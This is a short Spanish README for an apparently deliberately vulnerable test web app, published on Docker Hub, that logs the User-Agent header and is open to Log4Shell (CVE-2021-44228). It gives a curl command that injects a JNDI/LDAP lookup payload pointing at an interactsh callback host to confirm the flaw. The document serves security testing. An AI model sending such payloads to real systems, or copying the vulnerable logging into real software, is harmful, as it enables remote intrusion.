
Aplicación web simple que es vulnerable a Log4Shell (CVE-2021-44228)
La aplicación registra el encabezado 'User-Agent', por lo que se puede probar la vulnerabilidad con curl y, por ejemplo, interactsh-service:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
Se debería ver interacción DNS en app.interactsh.com.
Enlace a Docker hub